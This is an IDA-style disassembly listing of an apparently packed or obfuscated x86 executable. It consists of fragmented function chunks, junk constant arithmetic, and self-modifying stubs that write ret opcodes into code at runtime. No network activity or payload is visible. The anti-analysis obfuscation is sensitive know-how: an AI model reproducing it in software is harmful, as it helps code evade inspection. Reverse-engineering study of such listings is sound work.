; END OF FUNCTION CHUNK	FOR sub_453BBD

; =============== S U B	R O U T	I N E =======================================



sub_45196D	proc near		; CODE XREF: sub_43E507+73FDj
					; sub_451958p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F011 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F7F9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004425CF SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00442813 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442DE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004462BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BC81 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004541FD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045772C SIZE 00000009 BYTES

		xchg	edi, [esp-4+arg_0]
		mov	edx, edi
		pop	edi
		js	loc_45772C
		jmp	loc_4541FD
sub_45196D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450BDE

loc_45197E:				; CODE XREF: sub_450BDE:loc_445288j
		pop	esi
		add	esi, ds:4000F6h
		or	esi, 0D1C9D4F3h
		cmp	esi, 0DAB54A1Ch
		jmp	loc_440E66
; END OF FUNCTION CHUNK	FOR sub_450BDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEA9

loc_451996:				; CODE XREF: sub_43EEA9:loc_4396AEj
		mov	ebp, esp
		push	esi
		mov	esi, eax
		xchg	esi, [esp+8+var_8]
		jmp	loc_45B503
; END OF FUNCTION CHUNK	FOR sub_43EEA9
; ---------------------------------------------------------------------------

loc_4519A3:				; CODE XREF: hvvrg7ie:004556C4j
		push	106DB507h
		not	edi
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_4519AA:				; CODE XREF: sub_4554E8:loc_4556B1j
		add	ecx, 0A6D15Dh
		mov	[ecx], eax

loc_4519B2:				; CODE XREF: sub_449425:loc_442C30j
		pop	ecx
		lea	eax, loc_450DDD
		mov	byte ptr [eax],	0C3h

loc_4519BC:				; CODE XREF: sub_4484E1:loc_43BE77j
		jmp	loc_450DDD
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_4519C1:				; CODE XREF: sub_443452:loc_45A8D1j
		sub	eax, 440874F0h
		add	eax, 6A5ACD43h
		rol	eax, 3
		xor	eax, 27D9B297h
		add	eax, ebp
		push	esi
		push	67574804h
		jmp	loc_453323
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------

loc_4519E3:				; DATA XREF: sub_440AC5+17D9Fo
		lea	eax, sub_45AA38
		jnz	loc_44B93E
		push	edx
		push	0AE2416B7h
		pop	edx
		add	edx, 2651868Eh
		sub	edx, 54BB3C9Dh
		add	edx, 0AE3690D8h
		jmp	loc_454CDB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_451A0D:				; CODE XREF: sub_441DDD+B153j
		jle	loc_4489C1
		add	ecx, esi
		pushf

loc_451A16:				; CODE XREF: sub_441DDD:loc_44CF23j
		or	ebx, 4D11A9E7h
		js	loc_45A61E

loc_451A22:				; CODE XREF: sub_44D2F8-77FEj
		jmp	loc_442A17
; END OF FUNCTION CHUNK	FOR sub_441DDD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2D1

loc_451A27:				; CODE XREF: sub_44A2D1-7A38j
		jmp	loc_441263
; END OF FUNCTION CHUNK	FOR sub_44A2D1
; ---------------------------------------------------------------------------

loc_451A2C:				; CODE XREF: hvvrg7ie:00439BD5j
		jmp	loc_450DDD
; ---------------------------------------------------------------------------
		test	eax, 164C292Bh
		jmp	loc_45A607
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_451A3C:				; CODE XREF: sub_43B3BE+6B07j
		and	eax, 93A5455Bh
		add	eax, 6485C38h
		add	eax, ebp
		add	eax, 67B2A3C0h
		mov	eax, [eax]
		mov	dword ptr [ebp+eax*4-70h], 73257325h
		jmp	loc_447A17
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------

loc_451A5F:				; CODE XREF: hvvrg7ie:00447C40j
		jbe	loc_447288
		jmp	loc_43ABCA
; ---------------------------------------------------------------------------
		or	ebx, 6AAB983Fh
		jmp	loc_4419BE
; ---------------------------------------------------------------------------

loc_451A75:				; CODE XREF: hvvrg7ie:loc_44BD5Cj
		jbe	loc_43913F
		jmp	loc_43B31A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405D7

loc_451A80:				; CODE XREF: sub_4405D7-69C8j
		jnz	loc_43AAEB
		and	esi, 6EDC2F12h
		jmp	loc_44B108
; END OF FUNCTION CHUNK	FOR sub_4405D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_451A91:				; CODE XREF: sub_43A839+202FDj
		sub	eax, 0D3D9700Ch
		add	eax, 4A99B7ECh
		xor	eax, 6DAB7522h
		sub	eax, 0F32C9835h
		add	eax, 150DBD22h
		add	eax, ebp
		add	eax, 9044D31Ah
		mov	dword ptr [eax], offset	dword_474244
		jmp	loc_44C58C
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_451AC2:				; CODE XREF: sub_445CCD+12CA9j
		pop	eax
		and	eax, 5BF2F327h
		xor	eax, 8C3582Fh
		add	eax, ebp
		add	eax, 0AFAC26E4h
		jmp	loc_447C90
; END OF FUNCTION CHUNK	FOR sub_445CCD

; =============== S U B	R O U T	I N E =======================================



sub_451ADC	proc near		; DATA XREF: sub_442DEE:loc_45ACD5o

; FUNCTION CHUNK AT 00452338 SIZE 00000005 BYTES

		xor	eax, 8ACC9A01h
		sub	eax, 0E79E7953h
		push	offset sub_442ADB
		jmp	loc_452338
sub_451ADC	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_479. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_451AF3:				; CODE XREF: sub_453BA4-A006j
		jmp	loc_44E4C9
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_451AF8:				; CODE XREF: sub_4403B6+A27Aj
		rol	edi, 0Dh

loc_451AFB:				; CODE XREF: sub_4403B6:loc_44CD72j
		push	0F9C381F8h
		pop	eax
		rol	eax, 1Ah
		jmp	loc_4489E9
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45970D

loc_451B09:				; CODE XREF: sub_45970D+Aj
		pop	eax
		and	eax, 55D08788h
		rol	eax, 1Ah
		add	eax, 0DFFF0E40h
		xchg	eax, [esp+0]
		jmp	loc_4479DB
; END OF FUNCTION CHUNK	FOR sub_45970D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_451B21:				; CODE XREF: sub_4589D3:loc_44E991j
		xor	edx, 0DC09D463h
		shl	ebx, 12h
		test	esi, 6CDBBEE4h
		jmp	loc_43D6A3
; END OF FUNCTION CHUNK	FOR sub_4589D3

; =============== S U B	R O U T	I N E =======================================



sub_451B35	proc near		; CODE XREF: sub_445616:loc_443282j

; FUNCTION CHUNK AT 00450519 SIZE 00000005 BYTES

		add	esp, 0FFFFFFE4h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		xor	eax, eax
		jmp	loc_450519
sub_451B35	endp


; =============== S U B	R O U T	I N E =======================================



sub_451B45	proc near		; CODE XREF: sub_45200C+Dp
					; hvvrg7ie:0045B02Bj

; FUNCTION CHUNK AT 00440F57 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443097 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00447817 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455525 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00459DC2 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	4DED3380h
		pop	edi
		and	edi, 0B21C2B7Fh
		add	edi, 67FD60Eh
		and	edi, 6DFD23E5h
		jmp	loc_443097
sub_451B45	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_451B66:				; CODE XREF: sub_451DFF-7FE8j
		xchg	esi, [esp+0Ch+var_C]
		push	0A2C4D37h
		pop	edi
		add	edi, 683956E2h
		xor	edi, 27A693F8h
		rol	edi, 17h
		jb	loc_44DC37

loc_451B84:				; CODE XREF: hvvrg7ie:0043F934j
		jmp	loc_43CE20
; END OF FUNCTION CHUNK	FOR sub_451DFF
; ---------------------------------------------------------------------------
		mov	ebp, ebx
		jmp	loc_45A52C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_451B90:				; CODE XREF: sub_448663:loc_443CC7j
		jz	loc_455170
		jmp	loc_4553F1
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_451B9B:				; CODE XREF: sub_445CCD-33F4j
		xor	edx, 89269A1Bh
		jmp	loc_43C19F
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449232

loc_451BA6:				; CODE XREF: sub_449232+1Aj
		sub	ebx, edi
		jmp	loc_44A4A1
; END OF FUNCTION CHUNK	FOR sub_449232

; =============== S U B	R O U T	I N E =======================================



sub_451BAD	proc near		; CODE XREF: hvvrg7ie:0044E1DFj
					; hvvrg7ie:00458689p

; FUNCTION CHUNK AT 0044B71D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044CDA1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004508C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458841 SIZE 0000001D BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0D8B70678h
		pop	eax
		sub	eax, 42F5F044h
		jmp	loc_44B71D
sub_451BAD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_451BC2:				; CODE XREF: sub_43FC15-5ADj
		popf

loc_451BC3:				; CODE XREF: hvvrg7ie:loc_446D59j
		jmp	loc_44E797
; END OF FUNCTION CHUNK	FOR sub_43FC15

; =============== S U B	R O U T	I N E =======================================



sub_451BC8	proc near		; DATA XREF: hvvrg7ie:0043E621o

; FUNCTION CHUNK AT 0043918B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A4B9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445134 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044782A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004586FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A119 SIZE 00000005 BYTES

		push	0B9BC2EEAh
		pop	ecx
		and	ecx, 0A724EB23h
		cmp	ecx, 8D26B972h
		jmp	loc_4586FC
sub_451BC8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_451BDF:				; CODE XREF: sub_44398A+455Fj
		and	edx, 9A2C97B9h
		or	ebx, edi
		jmp	loc_448B81
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458082

loc_451BEC:				; CODE XREF: sub_458082+Dj
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		mov	eax, edx
		call	sub_4525FC
		mov	eax, [esp+0]
		call	sub_43E7F3
		retn
; ---------------------------------------------------------------------------

loc_451C01:				; CODE XREF: sub_458082j
		ror	eax, 19h
		jmp	loc_458B51
; END OF FUNCTION CHUNK	FOR sub_458082

; =============== S U B	R O U T	I N E =======================================



sub_451C09	proc near		; DATA XREF: sub_452EAFo
		push	ebx
		push	ecx
		push	offset sub_43B9FA
		jmp	nullsub_145
sub_451C09	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_451C15:				; CODE XREF: sub_44736C:loc_44D6D9j
					; sub_44736C+D326j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_443D82
		jmp	loc_458E54
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4485A2

loc_451C26:				; CODE XREF: sub_4485A2+CE64j
		jo	loc_4549A1
; END OF FUNCTION CHUNK	FOR sub_4485A2
; START	OF FUNCTION CHUNK FOR sub_448663

loc_451C2C:				; CODE XREF: sub_448663:loc_43B72Ej
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+0]
		push	5609F94Eh
		pop	ecx
		jmp	loc_452856
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
		mov	ds:off_41D208, eax
		lea	eax, sub_43B594
		mov	byte ptr [eax],	0C3h
		jmp	loc_44AE5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458175

loc_451C51:				; CODE XREF: sub_458175:loc_448C5Fj
		mov	eax, [esp+0]
		push	offset sub_43B624
		jmp	loc_44B51A
; END OF FUNCTION CHUNK	FOR sub_458175

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_451C5E	proc near		; CODE XREF: sub_43AB99:loc_45AC0Dj
		retn
sub_451C5E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_451C5F:				; CODE XREF: sub_44370F-64E0j
		jmp	sub_44370F
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------

loc_451C64:				; CODE XREF: hvvrg7ie:004500DAj
		jnz	loc_446E0E
		jmp	loc_4472EB
; ---------------------------------------------------------------------------

loc_451C6F:				; CODE XREF: hvvrg7ie:004412A4j
		and	ebx, ebp

loc_451C71:				; CODE XREF: hvvrg7ie:loc_43CF94j
		mov	eax, [ebp-0Ch]
		push	edi
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_451C75:				; CODE XREF: sub_450AA8:loc_444BA3j
		mov	edi, ecx
		xchg	edi, [esp-8+arg_4]
		mov	ecx, eax
		jmp	loc_4560A9
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
		and	ecx, ebp
		jmp	sub_43DB4C
; ---------------------------------------------------------------------------

loc_451C88:				; CODE XREF: hvvrg7ie:0044CC32j
		jge	loc_453967

; =============== S U B	R O U T	I N E =======================================



sub_451C8E	proc near		; CODE XREF: sub_447079:loc_44806Dp

; FUNCTION CHUNK AT 00456AF4 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ebp
		mov	ebp, esp
		jmp	loc_456AF4
sub_451C8E	endp

; ---------------------------------------------------------------------------

locret_451C9A:				; CODE XREF: hvvrg7ie:00457D78j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B334

loc_451C9B:				; CODE XREF: sub_45B334+6j
		jmp	loc_45155E
; END OF FUNCTION CHUNK	FOR sub_45B334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_451CA0:				; CODE XREF: sub_44D2F8-3B7Aj
		jmp	loc_449FD9
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_451CA5:				; CODE XREF: hvvrg7ie:00443F7Aj
		jmp	loc_45B0D7
; ---------------------------------------------------------------------------

loc_451CAA:				; CODE XREF: hvvrg7ie:loc_449047j
		jnz	loc_45A047
		jmp	loc_443D9E
; ---------------------------------------------------------------------------

loc_451CB5:				; CODE XREF: hvvrg7ie:0043A78Cj
		or	eax, 0D22626B4h
		sub	eax, 74A307EEh
		rol	eax, 0Dh
		add	eax, 796C671Fh
		xchg	eax, [esp]
		jmp	loc_449AC2
; ---------------------------------------------------------------------------

loc_451CD2:				; DATA XREF: sub_43F0A1:loc_43F0B8o
		add	dword ptr [ebp-8], 2
		jmp	loc_441E62
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8A5

loc_451CDB:				; CODE XREF: sub_451176+Ej
					; sub_43B8A5:loc_454AD7j
		test	byte ptr [ebp-8], 20h
		jz	loc_4433C3
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_445FD4

loc_451CEE:				; CODE XREF: sub_4554E8-3D26j
		mov	byte ptr [eax],	0C3h

loc_451CF1:				; CODE XREF: hvvrg7ie:0043F60Cj
		jmp	loc_43C2E9
; END OF FUNCTION CHUNK	FOR sub_43B8A5

; =============== S U B	R O U T	I N E =======================================



sub_451CF6	proc near		; CODE XREF: sub_419590+19p
					; hvvrg7ie:loc_43C99Aj	...
		push	esi
		push	offset sub_43D1A3
		jmp	nullsub_146
sub_451CF6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_451D01	proc near		; CODE XREF: sub_43E9D6+5C83j
		retn
sub_451D01	endp

; ---------------------------------------------------------------------------

loc_451D02:				; CODE XREF: hvvrg7ie:0044BCD7j
		jmp	loc_43E90F
; ---------------------------------------------------------------------------

loc_451D07:				; DATA XREF: sub_43F227+147B5o
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_451D0E:				; CODE XREF: sub_4465A6:loc_45932Aj
		jz	loc_4529AB
		jmp	loc_449C22
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_451D19:				; CODE XREF: hvvrg7ie:00449988j
		adc	eax, ecx
		and	edx, eax
		jmp	loc_4482D8
; ---------------------------------------------------------------------------

loc_451D22:				; DATA XREF: hvvrg7ie:00455264o
		push	eax
		ror	eax, 6
		push	ecx
		push	0BE85413Fh
		xchg	esi, [esp]
		mov	ecx, esi
		jmp	loc_440246
; ---------------------------------------------------------------------------

loc_451D36:				; CODE XREF: hvvrg7ie:0043B22Fj
					; hvvrg7ie:00453D58j
		sub	eax, 691DACBAh
		test	eax, 10000000h
		jmp	loc_43E5FC
; ---------------------------------------------------------------------------

loc_451D47:				; CODE XREF: hvvrg7ie:0045B756j
		call	sub_450C5A
		mov	ds:off_41D098, eax
		lea	eax, loc_43BA1D
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A8D6

; =============== S U B	R O U T	I N E =======================================



sub_451D60	proc near		; CODE XREF: sub_41AFA7+627p
					; hvvrg7ie:0043FA3Fj
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004395C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439767 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043ADE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FA31 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043FA45 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00443BB7 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00445BC5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F2DF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044FED3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004526FC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00453212 SIZE 00000020 BYTES

		push	edx
		jmp	loc_439767
sub_451D60	endp

; ---------------------------------------------------------------------------
		push	edx
		jmp	sub_446407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_451D6C:				; CODE XREF: sub_45061E:loc_4554B2j
		pop	edi
		or	edi, 8466690Eh
		add	edi, 515D09BBh
		popf
		jmp	loc_43CDA1
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------

loc_451D7F:				; CODE XREF: hvvrg7ie:0044B9D8j
		test	edx, 9816FD47h
		jmp	loc_43E989
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_451D8A:				; CODE XREF: sub_448BC0-3F90j
		ror	eax, 0Fh
		add	eax, 0DAC32D66h
		ror	eax, 19h
		add	eax, 7BB0A69h
		mov	edx, [esp+0]
		call	sub_43E813
		jno	loc_43BF36
		jmp	sub_449DC2
; END OF FUNCTION CHUNK	FOR sub_448BC0

; =============== S U B	R O U T	I N E =======================================



sub_451DAF	proc near		; DATA XREF: hvvrg7ie:00443483o
		xor	eax, 29617732h
		call	sub_458A13
		mov	ds:off_41D1F8, eax
		lea	eax, loc_44D806
sub_451DAF	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D7AC

loc_451DC6:				; CODE XREF: sub_44D7AC+4j
		call	sub_439B44

loc_451DCB:				; CODE XREF: sub_4495B9:loc_453032j
		jmp	nullsub_148
; END OF FUNCTION CHUNK	FOR sub_44D7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44048E

loc_451DD0:				; CODE XREF: sub_44048E:loc_440499j
		mov	[ebx], eax
		pop	ebx

loc_451DD3:				; CODE XREF: sub_449CB1-65D3j
					; sub_449CB1+296Cj
		jo	loc_451899
		add	eax, 9C73804Dh
		ror	eax, 1Fh
		push	ebx
		jmp	loc_44B8CE
; END OF FUNCTION CHUNK	FOR sub_44048E

; =============== S U B	R O U T	I N E =======================================



sub_451DE8	proc near		; CODE XREF: hvvrg7ie:00444D21j
					; sub_442FD1+789Ap

; FUNCTION CHUNK AT 00443C0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455FB3 SIZE 00000002 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	edx
		jmp	loc_443C0D
sub_451DE8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_451DF3:				; CODE XREF: sub_43D5FD+B1ECj
		push	eax
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_451DFA:				; CODE XREF: sub_43EB47+159Cj
		jmp	loc_43EC0A
; END OF FUNCTION CHUNK	FOR sub_43EB47

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_451DFF	proc near		; DATA XREF: sub_4580CF+5o

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 0043CE20 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043FF43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442159 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443946 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004495AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449E0D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044DC37 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044EB89 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B66 SIZE 00000023 BYTES

		push	edi
		mov	edi, ebp
		xchg	edi, [esp+0]
		mov	ebp, esp
		jmp	loc_44EB89
sub_451DFF	endp

; ---------------------------------------------------------------------------
		mov	eax, [edi]
		mov	[ebp+0], esi
		jmp	sub_4417B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FD2B

loc_451E17:				; CODE XREF: sub_43FD2B+AA0Ej
		jmp	loc_4455AA
; END OF FUNCTION CHUNK	FOR sub_43FD2B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_451E1C	proc near		; CODE XREF: sub_45426F+7j

var_A		= byte ptr -0Ah
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EC65 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444470 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445C0B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00446F4B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DF6A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044E833 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F24A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F7A5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452E34 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455345 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00455864 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00459220 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00459814 SIZE 00000018 BYTES

		push	ebp
		mov	ebp, esp
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+4+var_4]
		jmp	loc_44E833
sub_451E1C	endp


; =============== S U B	R O U T	I N E =======================================



sub_451E2A	proc near		; DATA XREF: sub_4481B6:loc_44698Do

arg_0		= dword	ptr  4

		pop	ecx
		xchg	edx, [esp-4+arg_0]
		mov	ebp, edx
		xchg	ebp, [esp-4+arg_0]
		mov	edx, ebp
		pop	ebp
		retn
sub_451E2A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_451E37:				; CODE XREF: sub_43F227+10E8Cj
		jz	loc_43BCB4
		jmp	loc_45B1F5
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_451E42:				; CODE XREF: sub_443452:loc_450904j
		xor	ecx, edi
		mov	esi, 0DCFAA0B1h
		jmp	loc_447838
; END OF FUNCTION CHUNK	FOR sub_443452

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_451E4E	proc near		; DATA XREF: sub_44957E:loc_43A283o
		jmp	sub_4044D2
sub_451E4E	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ebp, esp
		jo	loc_4524FE
		call	sub_45579D
		retn
; ---------------------------------------------------------------------------
		dw 1E2Bh
dword_451E64	dd 0A8335D88h		; DATA XREF: sub_44B3F1:loc_443B40r
					; hvvrg7ie:loc_44B905w
; ---------------------------------------------------------------------------

loc_451E68:				; CODE XREF: hvvrg7ie:0045A0ACj
		jmp	loc_442E1A

; =============== S U B	R O U T	I N E =======================================



sub_451E6D	proc near		; CODE XREF: sub_4044D2:loc_4043FFp
					; DATA XREF: _1fieagrn:off_41D1A4o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439F41 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A9F7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D52C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D649 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D8A1 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043F28E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440514 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441536 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441589 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441BE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441CC7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00442A71 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004430B2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004445F9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445C8D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445CEC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004493E9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AC7E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004505C3 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004515C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454CEA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045613D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457560 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A764 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AC53 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B7E4 SIZE 0000000A BYTES

		call	sub_448BC0

loc_451E72:				; CODE XREF: sub_43B6A5+59B5j
		jmp	loc_4515C6
sub_451E6D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_451E77:				; CODE XREF: hvvrg7ie:0045030Aj
		retn
; ---------------------------------------------------------------------------

loc_451E78:				; CODE XREF: hvvrg7ie:00453B44j
		add	esi, 329C82E0h
		and	edx, 0B4AF1B85h
; START	OF FUNCTION CHUNK FOR sub_440643

loc_451E84:				; CODE XREF: sub_440643:loc_453B36j
		add	eax, 96AC5729h
		add	eax, ebp
		add	eax, 6957B0F4h
		mov	eax, [eax]
		jmp	loc_4410A0
; END OF FUNCTION CHUNK	FOR sub_440643
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF30

loc_451E9A:				; CODE XREF: sub_43AF30+6AFEj
		jmp	loc_4494E9
; END OF FUNCTION CHUNK	FOR sub_43AF30

; =============== S U B	R O U T	I N E =======================================



sub_451E9F	proc near		; DATA XREF: sub_458A57-1F006o

